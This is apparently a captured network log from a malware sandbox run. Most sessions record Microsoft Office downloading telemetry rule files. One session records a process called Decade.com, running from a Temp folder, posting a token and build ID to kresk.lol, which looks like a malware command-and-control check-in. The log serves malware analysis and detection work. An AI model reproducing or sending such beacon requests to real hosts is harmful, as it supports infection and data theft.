2024-12-04 11:17:23 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.4	49805	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:22 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:23 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:23 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: 686307fb-901e-0029-3dcc-45274a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111723Z-1746fd949bdkw94lhC1EWRxuz4000000017g000000006k2v x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:23 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.4	49806	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:22 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:23 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:23 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: bbae04f8-a01e-0032-80cc-451949000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111723Z-1746fd949bdjrnwqhC1EWRpg280000000150000000005xcw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:23 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.4	49808	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:24 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:25 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:25 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: 71541f9e-801e-0078-2fc7-45bac6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111725Z-1746fd949bd4w8sthC1EWR700400000000x00000000040sf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:25 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.4	49811	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:25 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:25 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:25 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: 5cfda45f-901e-00ac-3dce-45b69e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111725Z-1746fd949bdlqd7fhC1EWR6vt0000000018000000000613c x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:25 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.4	49812	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:25 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:25 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:25 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: f87bd39b-701e-0097-59cc-45b8c1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111725Z-1746fd949bdnq7x2hC1EWRpxr000000000wg000000006rmh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:25 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.4	49810	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:25 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:25 UTC	491	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:25 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: 901a75be-701e-0053-76cb-453a0a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111725Z-1746fd949bdxk6n6hC1EWRdr8c00000000x0000000006whg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-04 11:17:25 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.4	49813	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:25 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:25 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:25 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 2accf417-001e-0014-64cb-455151000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111725Z-1746fd949bd9x4mhhC1EWRb76n0000000170000000002pvf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:25 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49819	159.69.102.165	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:26 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----LXTR9HLFK6F37YU3WT00 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kresk.lol Content-Length: 505 Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:26 UTC	505	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4c 58 54 52 39 48 4c 46 4b 36 46 33 37 59 55 33 57 54 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 36 34 39 64 36 38 62 33 64 34 66 30 34 35 66 32 37 64 65 35 38 35 39 38 65 66 37 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 54 52 39 48 4c 46 4b 36 46 33 37 59 55 33 57 54 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 33 63 35 30 61 33 61 36 32 37 35 66 66 33 31 62 37 38 64 30 64 36 35 31 32 33 61 64 31 34 0d 0a 2d 2d 2d 2d 2d 2d 4c 58 54 52 39 48 4c 46 4b 36 46 33 37 59 55 33 57 54 30 30 0d 0a 43 6f 6e 74 Data Ascii: ------LXTR9HLFK6F37YU3WT00Content-Disposition: form-data; name="token"89649d68b3d4f045f27de58598ef771d------LXTR9HLFK6F37YU3WT00Content-Disposition: form-data; name="build_id"933c50a3a6275ff31b78d0d65123ad14------LXTR9HLFK6F37YU3WT00Cont
2024-12-04 11:17:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 11:17:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-04 11:17:27 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.4	49820	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:27 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:27 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:27 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: 6fdb675e-b01e-0070-05ce-451cc0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111727Z-1746fd949bd77mkmhC1EWR5efc00000001e00000000033x3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:27 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.4	49822	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:27 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:27 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:27 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: 8c60988c-801e-00a3-08c1-457cfb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111727Z-1746fd949bd6zq92hC1EWRry480000000140000000003xac x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:27 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.4	49824	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:27 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:27 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:27 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: 1a0f4f93-001e-0049-61cb-455bd5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111727Z-1746fd949bdl6zq5hC1EWRf3ws00000000ug000000003s00 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:27 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.4	49821	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:27 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
